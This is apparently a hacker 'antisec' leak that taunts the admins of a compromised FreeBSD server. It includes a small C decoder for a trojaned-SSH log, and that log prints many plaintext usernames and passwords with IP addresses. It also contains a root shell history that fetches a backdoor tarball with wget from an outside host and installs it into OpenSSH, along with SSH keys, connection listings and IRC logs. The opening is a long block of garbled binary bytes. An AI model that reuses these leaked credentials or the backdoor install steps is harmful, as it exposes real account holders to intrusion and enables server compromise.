+·°°´¶±Ɵ’šŝŠƙ•˜�´¶±Ɵ–’–‘•˜ƎŒŒ˜†ϥ¾¼¸ª¥¹¬�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±ƟœŠœ“‰š¾žϵ·°°´¶±ƟœŠœ“‰š¾žϵ·°°´¶±Ɵœ—žŒυ’žЎ͋—�´¶±Ɵ†žŽŠ–ŒŜ“Œšš“†̊ʵ·°°´¶±ƟŒ’žŒ—őΘˆ—ύš�´°ª«ƟLJҎ΋Ҏɉ҈ʟœ†œ“šŋЏ³ȵ·°°´°ª«ƟLJҎǍҍ̉҈П“ž˜ś–‘Œ—–‹“–”šž‘ž“–š‘�´°ª«ƟLJҎǍҍ̉҈П“ž˜ś–‘Œ—–‹“–”šž‘ž“–š‘�´°ª«ƟLJҎǍҍ̉҈П“ś–‘Œ—–‹“–”šž‘ž“–š‘�´°ª«ƟLJҎǍҍ̉҈П“ž˜ʼnž‘–‹†І�´°ª«ƟLJҎǍҍ̉҈П“ž˜ʼnž‘–‹†І�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ’ž‹‹Ņš›žЍ�´¶±Ɵ’ž‹‹Ņš›žЍ�´¶±Ɵ’ž‹‹Ņš›žЍ�´¶±Ɵ’ž‹‹Ņš›žЍ�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ’ž‹‹Ņš›žЍ�´¶±Ɵ†žŽŠ–ŒŜ“Œšš“†̊ʵ·°°´¶±ƟŒ†œ…ŕš“šŒŠ–Œ�´¶±ƟŒ†œ…ŕš“šŒŠ–Œ�´¶±Ɵ†žŽŠ–ŒŜ“Œšš“†̊ʵ·°°´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ†žŽŠ–ŒŜ“Œšš“†̊ʵ·°°´¶±Ɵ”ŠžžŞŒ“ŒІΌ�´¶±Ɵ’˜ˆ‹™ő”–ž…�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ†žŽŠ–ŒŜ“Œšš“†̊ʵ·°°´¶±Ɵ’ž‹‹Ņš›žЍ�´¶±Ɵ’ž‹‹Ņš›žЍ�´¶±Ɵ’ž‹‹Ņš›žЍ�´¶±ƟŒ‹šŋœ‡’ύύ�´¶±Ɵœž……φʎŜ˅…†΍œ›�´¶±Ɵžŏž“”ž�´¶±Ɵžŏž“”ž�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵœ—žŒυ’žЎ͋—�´¶±ƟŒ’žŒ—őΘˆ—ύš�´¶±Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�´¶±Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�´¶±Ɵ–’–‘•˜ƎŒŒ˜†ϥ¾¼¸ª¥¹¬�´¶±Ɵ–’–‘•˜ƎŒŒ˜†ϥ¾¼¸ª¥¹¬�´¶±Ɵ“”˜ž…Ƒ½“–‘›ϑ�´¶±Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�´¶±Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵž“š‡ő–…ž‹š�´°ª«ƟχǑϋҍЊҋΟ•Š‘–ƎΌ�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�´¶±Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�´¶±Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵœ—žŒυ’žЎ͋—�´¶±Ɵ’ž‹‹Ņš›žЍ�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�´¶±Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�´¶±Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�´¶±Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�´¶±Ɵœ—žŒυ’žЎ͋—�´¶±Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�´¶±Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ†žŽŠ–ŒŜ“Œšš“†̊ʵ·°°´°ª«ƟχǑϋҍЊҋΟ•Š‘–ƎΌ�´°ª«ƟLJҎ΋Ҏɉ҈ʟœ†œ“šŋЏ³ȵ·°°´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´°ª«ƟLJҎǍҍ̉҈Пœ†œ“šŋЏ³ȵ·°°´°ª«ƟLJҎǍҍ̉҈ПŒ’žŒ—őΘˆ—ύš�´°ª«ƟLJҎ΋Ҏɉ҈ʟœ†œ“šŋЏ³ȵ·°°´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´°ª«ƟLJҎ΋Ҏɉ҈ʟœ†œ“šŋЏ³ȵ·°°´°ª«ƟχǑϋҍЊҋΟ•Š‘–ƎΌ�´°ª«ƟχǑϋҍЊҋΟ•Š‘–ƎΌ�´°ª«ƟLJҎǍҍ̉҈ПŒ’žŒ—őΘˆ—ύš�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ†žŽŠ–ŒŜ“Œšš“†̊ʵ·°°´°ª«ƟȆҋʑϏБΊΟœ†œ“šŋЏ“ȵ·°°´°ª«ƟȆҋʑϏБΊΟœ†œ“šŋЏ³ȵ·°°´¶±Ɵœ—žŒυ’žЎ͋—�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ†žŽŠ–ŒŜ“Œšš“†̊ʵ·°°´¶±Ɵ†žŽŠ–ŒŜ“Œšš“†̊ʵ·°°´°ª«ƟʈҍΊҎ̍҆ȟχ̞ˆ‘‹ō´»œӊ˥µ�´°ª«ƟLJҎ΋Ҏɉ҈ʟœ†šŋЏ³ȵ·°°´°ª«ƟȆҋʑϏБΊΟœ†šŋЏ“ȵ·°°´°ª«ƟLJҎ΋Ҏɉ҈ʟœ†œ“šŋЏ“ȵ·°°´°ª«ƟLJҎ΋Ҏɉ҈ʟœ†œ“šŋЏ³ȵ·°°´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵœ—žŒυ’žЎ͋—�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´°ª«ƟȆҋʑϏБΊΟœ†œ“šŋЏ³ȵ·°°´°ª«ƟʈҍΊҎ̍҆ȟχ̞ˆ‘‹ō´»œӊ˥µ�´¶±Ɵœ—žŒυ’žЎ͋—�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ”ŠžžŞŒ“ŒІΌ�´¶±Ɵœ’’Ō”†“–‘͵·°°´¶±Ɵœ—žŒυ’žЎ͋—�´°ª«ƟȆҋʑϏБΊΟœ†œ“šŋϳȵ·°°´°ª«ƟȆҋʑϏБΊΟœ†œ“šŋЏ³ȵ·°°´°ª«ƟȆҋʑϏБΊΟœ†œ“šŋЏ³ȵ·°°´¶±Ɵ–’–‘•˜ƎŒŒ˜†ϥ¾¼¸ª¥¹¬󋈍
+
+
+
+[root@velocity:/var/run]# cat lame.c 
+#include 
+
+int main(int argc, char *argv[])
+{
+  FILE *n00bfile;
+  unsigned int lamechar;
+  if(argc < 2)
+          printf("Usage: %s filename\n",argv[0]);
+  if((n00bfile = fopen(argv[1],"r"))) {
+           while((lamechar = fgetc(n00bfile)) != EOF) {
+                            printf("%c",~lamechar);
+           }
+           fclose(n00bfile);
+  }
+  return 0;
+}
+
+// Let's try out our complex decryption program..
+
+[root@velocity:/var/run]# gcc -o lame lame.c
+[root@velocity:/var/run]# rm lame.c 
+[root@velocity:/var/run]# ./lame ssh.old 
+HOOKIN: romeo:bu9fjogr 
+HOOKIN: pimpinjg:1ssgy0ZACGUZFS // Our luvbirdz once again.. This time hidding..:)
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: cpu:lloverAa1
+HOOKIN: cpu:lloverAa1
+HOOKIN: chaos1:ma012th
+HOOKIN: yaquis:closereply456
+HOOKIN: smash:n1gwh0re
+HOOKOUT: 98.124.176.76 cycle:t00L8
+HOOKOUT: 98.192.246.70 lag:droppinshitlikeanalien
+HOOKOUT: 98.192.246.70 lag:droppinshitlikeanalien
+HOOKOUT: 98.192.246.70 l:droppinshitlikeanalien
+HOOKOUT: 98.192.246.70 lag:vanity09
+HOOKOUT: 98.192.246.70 lag:vanity09
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: matt:zeda02
+HOOKIN: matt:zeda02
+HOOKIN: matt:zeda02
+HOOKIN: matt:zeda02
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: matt:zeda02
+HOOKIN: yaquis:closereply456
+HOOKIN: psycoz:jelesuis
+HOOKIN: psycoz:jelesuis
+HOOKIN: yaquis:closereply456
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: yaquis:closereply456
+HOOKIN: kruapra:asls0923
+HOOKIN: omgwtf:nokiaz
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: yaquis:closereply456
+HOOKIN: matt:zeda02
+HOOKIN: matt:zeda02
+HOOKIN: matt:zeda02
+HOOKIN: ste:tcxm1212
+HOOKIN: cazz1961:c4zzy1rcd
+HOOKIN: apo:parolka
+HOOKIN: apo:parolka
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: chaos1:ma012th
+HOOKIN: smash:n1gwh0re
+HOOKIN: katsst:ch0w$ie
+HOOKIN: katsst:ch0w$ie
+HOOKIN: pimpinjg:1ssgy0ZACGUZFS
+HOOKIN: pimpinjg:1ssgy0ZACGUZFS
+HOOKIN: blkgraz:.Blind1.
+HOOKIN: katsst:ch0w$ie
+HOOKIN: katsst:ch0w$ie
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: alexbb:noizarte
+HOOKOUT: 189.14.205.42 junior:123
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: katsst:ch0w$ie
+HOOKIN: katsst:ch0w$ie
+HOOKIN: katsst:ch0w$ie
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: chaos1:ma012th
+HOOKIN: matt:zeda02
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: katsst:ch0w$ie
+HOOKIN: katsst:ch0w$ie
+HOOKIN: katsst:ch0w$ie
+HOOKIN: katsst:ch0w$ie
+HOOKIN: chaos1:ma012th
+HOOKIN: katsst:ch0w$ie
+HOOKIN: katsst:ch0w$ie
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: yaquis:closereply456
+HOOKOUT: 189.14.205.42 junior:123
+HOOKOUT: 98.124.176.76 cycle:t00L8
+HOOKIN: ioplex:I*!@ONLINE
+HOOKOUT: 98.192.246.70 cycle:t00L8
+HOOKOUT: 98.192.246.70 smash:n1gwh0re
+HOOKOUT: 98.124.176.76 cycle:t00L8
+HOOKIN: ioplex:I*!@ONLINE
+HOOKOUT: 98.124.176.76 cycle:t00L8
+HOOKOUT: 189.14.205.42 junior:123
+HOOKOUT: 189.14.205.42 junior:123
+HOOKOUT: 98.192.246.70 smash:n1gwh0re
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: yaquis:closereply456
+HOOKOUT: 89.46.100.252 cycle:t00l8
+HOOKOUT: 89.46.100.252 cycle:t00L8
+HOOKIN: chaos1:ma012th
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: yaquis:closereply456
+HOOKIN: yaquis:closereply456
+HOOKOUT: 67.225.142.98 0x3aownt:rKDcb-54ZJ // puma.makosolutions.com
+HOOKOUT: 98.124.176.76 cyber:t00L8
+HOOKOUT: 89.46.100.252 cyber:t00l8
+HOOKOUT: 98.124.176.76 cycle:t00l8
+HOOKOUT: 98.124.176.76 cycle:t00L8
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: chaos1:ma012th
+HOOKIN: ioplex:I*!@ONLINE
+HOOKOUT: 89.46.100.252 cycle:t00L8
+HOOKOUT: 67.225.142.98 0x3aownt:rKDcb-54ZJ // puma.makosolutions.com
+HOOKIN: chaos1:ma012th
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: kruapra:asls0923
+HOOKIN: cmm:skylin3
+HOOKIN: chaos1:ma012th
+HOOKOUT: 89.46.100.252 cycle:t0L8
+HOOKOUT: 89.46.100.252 cycle:t00L8
+HOOKOUT: 89.46.100.252 cycle:t00L8
+HOOKIN: pimpinjg:1ssgy0ZACGUZFS
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: katsst:ch0w$ie
+HOOKIN: yaquis:closereply456
+HOOKIN: smash:n1gwh0re
+HOOKIN: smash:n1gwh0re
+HOOKIN: smash:n1gwh0re
+HOOKIN: smash:n1gwh0re
+HOOKIN: katsst:ch0w$ie
+HOOKIN: yaquis:closereply456
+HOOKIN: yaquis:closereply456
+HOOKIN: ioplex:I*!@ONLINE
+HOOKIN: pimpinjg:1ssgy0ZACGUZFS
+HOOKIN: katsst:ch0w$ie
+HOOKIN: blkgraz:.Blind1.
+HOOKIN: blkgraz:.Blind1.
+HOOKIN: blkgraz:.Blind1.
+HOOKIN: blkgraz:.Blind1.
+HOOKOUT: 89.46.100.252 cycle:t00L8
+[root@velocity:/var/run]#
+
+// 0wn3d by y0ur 0wn backd00r.. 
+
+
+[root@velocity:~]# cat /etc/profile 
+# $FreeBSD: src/etc/profile,v 1.14 2004/06/06 11:46:27 schweikh Exp $
+#
+# System-wide .profile file for sh(1).
+#
+# Uncomment this to give you the default 4.2 behavior, where disk
+# information is shown in K-Blocks
+# BLOCKSIZE=K; export BLOCKSIZE
+#
+# For the setting of languages and character sets please see
+# login.conf(5) and in particular the charset and lang options.
+# For full locales list check /usr/share/locale/*
+# You should also read the setlocale(3) man page for information
+# on how to achieve more precise control of locale settings.
+#
+# Read system messages
+# msgs -f
+# Allow terminal messages
+# mesg y
+export PS1="[\u@\h:\w]\\$ "
+alias ls='/bin/ls -GFa'
+alias ll='/bin/ls -GFal'
+alias lo='/bin/ls -GFalo'
+export LSCOLORS=ExGxFxf5CxfgDxabagacad
+export EDITOR=pico
+TMOUT=1800
+
+export HISTFILE=~/.bshrc // Bypassing backdoor HISTFILE=/dev/null
+export HISTSIZE=1500   
+
+[root@velocity:~]# 
+
+// After a while... 
+
+[root@velocity:~]# cat /root/.bshrc 
+w
+rm -rf hax
+rm -rf lol.tar.gz
+ls -la
+exit
+w
+wget http://board.whois.co.kr/lol.tar.gz // See attachments section for lol.tar.gz backdoor
+tar -zxf lol.tar.gz
+cd hax 
+ls -la 
+ssh -v 
+vi version.h // OpenSSH Version editing
+./quick // Installation
+cd .. 
+ls -la
+cd /home/romeo/
+ls -la
+cat  .bash_history
+ls -la
+cd .irssi/
+ls -la
+rm -rf away.log // Too late..
+cd ..
+ls -la
+w
+ps aux | grep ssh
+netstat -an | grep :22 // See the remaining 18 netstats.. not counting who and kills.. 
+netstat -an | grep 22
+netstat -an | grep ssh
+netstat -a | grep 22
+netstat -an | grep .22
+env
+netstat -an | grep 188.51.85.13
+netstat -an | grep 248.22
+w
+netstat -anp | grep 248.22
+netstat -an | grep 248.22
+whois 98.242.244.25
+ps aux | grep ssh
+kill -9 8095
+kill -9 8128
+kill -9 8866
+ps aux | grep ssh
+kill -9 92546
+kill -9 93418
+w
+env
+netstat -an | grep 188.51.85.13
+netstat -an | grep .248.22
+w
+ls -al
+cat > w
+sh x
+sh w
+ls -la
+bas w
+bash w
+ls -la
+cat w
+netstat -tanp 
+ps aux | grep ssh
+kill -9 43929
+kill -9 75936
+kill -9 75934
+ps aux | grep ssh
+kll -9 23783
+kill -9 23783
+ps aux | grep ssh
+time
+date
+ls -la
+chmod +x w
+./w
+ls -la
+rm -f w
+ps aux | grep ssh
+kill -9 22353
+ ps aux | grep ssh
+kill -9 9078
+ ps aux | grep ssh
+env
+netstat -an | grep 188.51.85.13
+netstat -an | grep .248.22
+csf
+last | grep 98.242.244.25
+lastlog
+w
+ls -la
+netstat -anp tcp
+netstat -anp tcp | grep .22
+netstat -anp tcp | grep 72.20.28.226.6697
+netstat -anp
+netstat -anp tcp
+sockstat
+ps aux | grep ioplex
+exit
+w
+cd ~pimpinjg/
+ls -la
+cat .bash_history
+w
+ls -la
+cd /
+ls -la
+cd /tmp
+ls -la
+cd /var/log
+ls -la
+tail -f messages
+cat security | grep romeo
+cat security | grep root
+w
+cd ~romeo
+ls -la
+cat  .bash_history
+ps aux | grep romeo
+ps aux | grep romeo
+ps aux | grep ssh
+w
+ls -la
+w
+ls -la
+ps aux
+ps aux | grep irc
+ping velocity.vitalspeeds.com
+[root@velocity:~]# 
+
+/* 
+RoMe0 in panic mode.. netstat.. netstat.. netstat.. 
+Thank you for all the fish.. n00bfish..
+*/
+
+[root@velocity:~]# cat /usr/home/pimpinjg/.bshrc 
+nano .bashrc
+clear
+ls
+grep -r motd
+grep -r motd *
+clear
+rm -rf znc*
+clear
+ls
+clear
+PS1='\033[1;32m\]\033[1;30m\][\033[1;32m\]root\[\033[1;30m\]@\[\033[1;32m\]\h\[\033[1;30m\]]:[\033[1;32m\]\w\[\033[1;30m\]]\[\033[1;30m\]\$\[\033[0m\] '
+clear
+uptime
+ps aux
+ls -al
+uptime
+clear
+ls
+nano .profile
+nano .bashprompt
+exit
+clear
+screen -r
+clear
+exit
+clear
+screen -r
+screen -r
+clear
+exit
+[root@velocity:~]# 
+
+// Advanced Linux Administration Skillz.. The 2 years of extensive training finally paid off.. 
+
+
+[root@velocity:~]# cat /usr/home/pimpinjg/.ssh/known_hosts
+localhost ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxLk6rsYWY3ASi1AXMnWKeEd9Tqdcw0P+v7gGKHjGUdcPQZ00S5xotswbKD4/XI3StqVkQLOrcOvDebZ7uJjSpW/d7G1BeMdav8QjS+Q/Hxk8tzPPI+95/iviCW3dQbtxOEdXwcgTucw7d4GaGqexScbG+kOYzGc6ZZxSKJlqiM29s6ri1kfLDay/5/YZnz3Ms3081Hsxnrdbb0TOrpOJdbirgL4Ipe0DBaf1d/QQxGf6CFTbFKsm4RWuQWICiF7AFmHqgElMUYodjnDTmJjwjFbIipUsPvEjNabuYXHkUaA2iOYvpso13HdgYVdgJpFc269L435Uh4XBolEziEnrWQ==
+72.20.28.205 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxLk6rsYWY3ASi1AXMnWKeEd9Tqdcw0P+v7gGKHjGUdcPQZ00S5xotswbKD4/XI3StqVkQLOrcOvDebZ7uJjSpW/d7G1BeMdav8QjS+Q/Hxk8tzPPI+95/iviCW3dQbtxOEdXwcgTucw7d4GaGqexScbG+kOYzGc6ZZxSKJlqiM29s6ri1kfLDay/5/YZnz3Ms3081Hsxnrdbb0TOrpOJdbirgL4Ipe0DBaf1d/QQxGf6CFTbFKsm4RWuQWICiF7AFmHqgElMUYodjnDTmJjwjFbIipUsPvEjNabuYXHkUaA2iOYvpso13HdgYVdgJpFc269L435Uh4XBolEziEnrWQ==
+189.14.205.42 ssh-dss AAAAB3NzaC1kc3MAAACBAJgf4VlHspyNWVtAQpi0Lsf78P5bted4NBEAk0MX6w0DNnomC1/kiqOa2pNeZSB05NT42z8+Pxc2a5JwNRolfbpRXPMvMvHYwDMsZAYerz6KOc04nwVskMLBP47bBV6IMbJf2DV7OMBuZI4Li7QfAyW/qJpwUnctChFjSscyv+srAAAAFQDiHNMyrvXk8AJkeKusaJ9vUGdtJwAAAIBr1lDX9MHqMpoeZFE3vX6VbrPfBqK5Zm0EgdSf9QdbGFVD5YcLQhyc88jsrR2sCUBNmQN9hV8o7NedqAFQK1RKToN7ZvrzuFNcOT+yO6/B1Z2WniNojmrbd7/27dJCQz02yXl96f1pFUUcU7gRMdgI9WngNqOE8ZMl3B/jw/MwuAAAAIAoMJDeUlKhowiywrlFC511AfRe+5KfhqK2ohhKne1yr4r5fBrVeTsZeN39qeu23dUOTc7xXP47Iu7STxF7vX6Jw29OWx9vytwbCGNHPMr1kTgRr9n+lHutOZmCqvag2rALA8gs+KUfYrwdUs1p7PDVuTO8bk4HRSPs9wCQnlmpOg==
+
+[root@velocity:~]# cat /usr/home/pimpinjg/.ssh/authorized_keys
+ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAn6d6bVIeir4IWs3b8F8kUfiaHKXZ+4nwuQpRMaoI67rqY8Tmjp5oFgT7CeRCIF0GUXAjY3my4T3GcV0ed+/5ilyoC0NG5W/TAvF62IQpQop9apP8HBlyiOaHuXgNVbit6/1EUW4SvLWdUe8zNqTWPw0/qZ2eQAEH8E+cbqT8LYsNWsQI9tpcJykigRZF1TqjL6vJtbQLqSgr2Gdz1+Xv9wXKlxdHSLa5ay5VuEij6w6rUS7ZI9OoOqGA2NICjs008cOy3yhCVHh1V7I50rLoPZWBZa72VBPPMvqiJpHbcIP8+NaXnIeLoINnYsV3xk27lSDT0UBBHLQ5miaLnvEzgw== pimpinjg@mercedes.pimpinjg.ch
+
+
+[root@velocity:/var/run]# lsof -i -n | grep ssh
+sshd      19971       root    3u  IPv6 0xcc1771d0      0t0  TCP *:ssh (LISTEN)
+sshd      19971       root    4u  IPv4 0xc585e000      0t0  TCP *:ssh (LISTEN)
+
+sshd      23362       root    3u  IPv4 0xca6ae570      0t0  TCP 72.20.28.248:ssh->188.51.85.13:57409 (ESTABLISHED) 
+sshd      23383      romeo    3u  IPv4 0xca6ae570      0t0  TCP 72.20.28.248:ssh->188.51.85.13:57409 (ESTABLISHED) 
+
+sshd      28333       root    3u  IPv4 0xc9fc4570      0t0  TCP 72.20.28.206:ssh->72.223.92.235:6345 (ESTABLISHED)
+sshd      28335     yaquis    3u  IPv4 0xc9fc4570      0t0  TCP 72.20.28.206:ssh->72.223.92.235:6345 (ESTABLISHED)
+sshd      30593       root    3u  IPv4 0xc97b93a0      0t0  TCP 72.20.28.204:ssh->75.84.149.5:1294 (ESTABLISHED)
+sshd      30595     katsst    3u  IPv4 0xc97b93a0      0t0  TCP 72.20.28.204:ssh->75.84.149.5:1294 (ESTABLISHED)
+sshd      30595     katsst   10u  IPv4 0xc5b901d0      0t0  TCP 72.20.3.98:63271->192.168.1.1:http (SYN_SENT)
+sshd      30595     katsst   11u  IPv4 0xc590eae0      0t0  TCP 72.20.3.98:60359->91.184.73.195:46464 (ESTABLISHED)
+sshd      30595     katsst   12u  IPv4 0xc94fc570      0t0  TCP 72.20.3.98:61645->79.66.132.125:44020 (ESTABLISHED)
+sshd      30595     katsst   13u  IPv4 0xc5eb2910      0t0  TCP 72.20.3.98:62162->192.168.1.1:http (SYN_SENT)
+sshd      30595     katsst   14u  IPv4 0xc996d000      0t0  TCP 127.0.0.1:58269->127.0.0.1:33282 (SYN_SENT)
+sshd      30595     katsst   15u  IPv4 0xc954e910      0t0  TCP 72.20.3.98:60168->72.185.123.4:6601 (ESTABLISHED)
+sshd      30595     katsst   17u  IPv4 0xc99f81d0      0t0  TCP 72.20.3.98:60170->66.245.139.243:53066 (ESTABLISHED)
+sshd      30595     katsst   18u  IPv4 0xca0c1570      0t0  TCP 72.20.3.98:60172->124.168.34.236:50666 (ESTABLISHED)
+sshd      30595     katsst   19u  IPv4 0xcaf02910      0t0  TCP 72.20.3.98:60173->130.212.54.5:28573 (ESTABLISHED)
+sshd      30595     katsst   22u  IPv4 0xc9dd9740      0t0  TCP 72.20.3.98:60180->173.22.219.92:64415 (ESTABLISHED)
+sshd      30595     katsst   23u  IPv4 0xc622c570      0t0  TCP 72.20.3.98:60178->173.54.28.183:22677 (ESTABLISHED)
+sshd      30595     katsst   27u  IPv4 0xca10bcb0      0t0  TCP 72.20.3.98:60183->79.101.217.199:55824 (ESTABLISHED)
+sshd      30595     katsst   28u  IPv4 0xcc5021d0      0t0  TCP 72.20.3.98:60188->92.72.182.81:50009 (ESTABLISHED)
+sshd      30595     katsst   29u  IPv4 0xcc3dd740      0t0  TCP 72.20.3.98:60189->65.26.34.13:23928 (ESTABLISHED)
+sshd      30595     katsst   30u  IPv4 0xc972b740      0t0  TCP 72.20.3.98:60190->87.80.43.167:49878 (ESTABLISHED)
+sshd      30595     katsst   35u  IPv4 0xca1413a0      0t0  TCP 72.20.3.98:60195->61.229.122.218:42282 (ESTABLISHED)
+sshd      30595     katsst   38u  IPv4 0xc61be910      0t0  TCP 72.20.3.98:60198->67.185.180.151:21366 (ESTABLISHED)
+sshd      30595     katsst   42u  IPv4 0xca1cb1d0      0t0  TCP 72.20.3.98:60202->81.246.198.243:21771 (ESTABLISHED)
+sshd      30595     katsst   43u  IPv4 0xc9db61d0      0t0  TCP 72.20.3.98:60203->71.228.40.165:13289 (ESTABLISHED)
+sshd      30595     katsst   46u  IPv4 0xc61bd3a0      0t0  TCP 72.20.3.98:60217->70.69.35.95:48486 (ESTABLISHED)
+sshd      30595     katsst   49u  IPv4 0xc92c6000      0t0  TCP 72.20.3.98:60224->24.245.45.179:56678 (ESTABLISHED)
+sshd      30595     katsst   52u  IPv4 0xcae45740      0t0  TCP 72.20.3.98:60229->66.41.52.92:26396 (ESTABLISHED)
+sshd      30595     katsst   56u  IPv4 0xca03d740      0t0  TCP 72.20.3.98:60258->122.167.178.174:29404 (ESTABLISHED)
+sshd      30595     katsst   82u  IPv4 0xc9dbacb0      0t0  TCP 72.20.3.98:60295->77.250.210.43:62003 (ESTABLISHED)
+sshd      30595     katsst   85u  IPv4 0xca0793a0      0t0  TCP 72.20.3.98:60311->93.97.7.183:38461 (ESTABLISHED)
+sshd      30595     katsst   86u  IPv4 0xc9a1c000      0t0  TCP 72.20.3.98:60307->65.33.173.202:24132 (ESTABLISHED)
+sshd      30595     katsst   87u  IPv4 0xc986f910      0t0  TCP 72.20.3.98:60312->74.173.228.216:61577 (ESTABLISHED)
+sshd      30622       root    3u  IPv4 0xc98fb000      0t0  TCP 72.20.28.205:ssh->89.30.147.8:3766 (ESTABLISHED)
+sshd      30890       root    3u  IPv4 0xc58eb000      0t0  TCP 72.20.28.205:ssh->89.30.147.8:3812 (ESTABLISHED)
+[root@velocity:/var/run]# 
+
+ANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZ
+ANTISECFORLULZ														      ANTISECFORLULZ
+ANTISECFORLULZ	[root@velocity:/]# ps -aux | grep romeo									      ANTISECFORLULZ
+ANTISECFORLULZ	root       98610  0.0  0.2  5400  2004  ??  Is   12:16PM   0:00.19 sshd: romeo [priv] (sshd)		      ANTISECFORLULZ
+ANTISECFORLULZ	romeo      98648  0.0  0.2  5384  2052  ??  S    12:16PM   0:03.21 sshd:  (sshd)			      ANTISECFORLULZ
+ANTISECFORLULZ	romeo      27874  0.0  0.6  9104  6212  p0  S+    2:21PM   0:04.59 irssi -h absolute.ownage.net		      ANTISECFORLULZ
+ANTISECFORLULZ	romeo      32521  0.0  0.1  3272  1384  p0  Is    7:40PM   0:00.05 /usr/local/bin/bash                        ANTISECFORLULZ
+ANTISECFORLULZ	romeo      27845  0.0  0.1  2040  1376  p2  S+    2:20PM   0:00.04 screen -r				      ANTISECFORLULZ
+ANTISECFORLULZ	romeo      98652  0.0  0.2  3244  1848  p2  Is   12:16PM   0:00.03 -bash (bash)				      ANTISECFORLULZ
+ANTISECFORLULZ	root       32868  0.0  0.1  1552   872  p3  L+    4:23PM   0:00.00 grep romeo				      ANTISECFORLULZ
+ANTISECFORLULZ														      ANTISECFORLULZ
+ANTISECFORLULZ	[root@velocity:/]# killall screen									      ANTISECFORLULZ
+ANTISECFORLULZ														      ANTISECFORLULZ
+ANTISECFORLULZ	[00:25:59] * Quits: @pimpinjg (FBI@tdirc-1243C38A.deploy.akamaitechnologies.com) (Quit: Lost terminal)	      ANTISECFORLULZ
+ANTISECFORLULZ	[00:25:59] * Quits: &RoMeO (root@DarkMindZ.com) (Quit: Lost terminal)					      ANTISECFORLULZ
+ANTISECFORLULZ														      ANTISECFORLULZ
+ANTISECFORLULZ														      ANTISECFORLULZ
+ANTISECFORLULZ	[12:29am] <~RoMeO> wtf is up with screen :@ 								      ANTISECFORLULZ
+ANTISECFORLULZ	[12:29am] <+G-Brain> 23:26 -!- RoMeO [root@DarkMindZ.com] has quit [Quit: Lost terminal]		      ANTISECFORLULZ
+ANTISECFORLULZ	[12:30am] <~RoMeO> "[screen is terminating]" with no reason						      ANTISECFORLULZ
+ANTISECFORLULZ	[12:30am] <+G-Brain> hah										      ANTISECFORLULZ
+ANTISECFORLULZ	[12:30am] <%p3ri0d> oh yeah										      ANTISECFORLULZ
+ANTISECFORLULZ	[12:30am] <+G-Brain> it has a few shitty default key bindings						      ANTISECFORLULZ
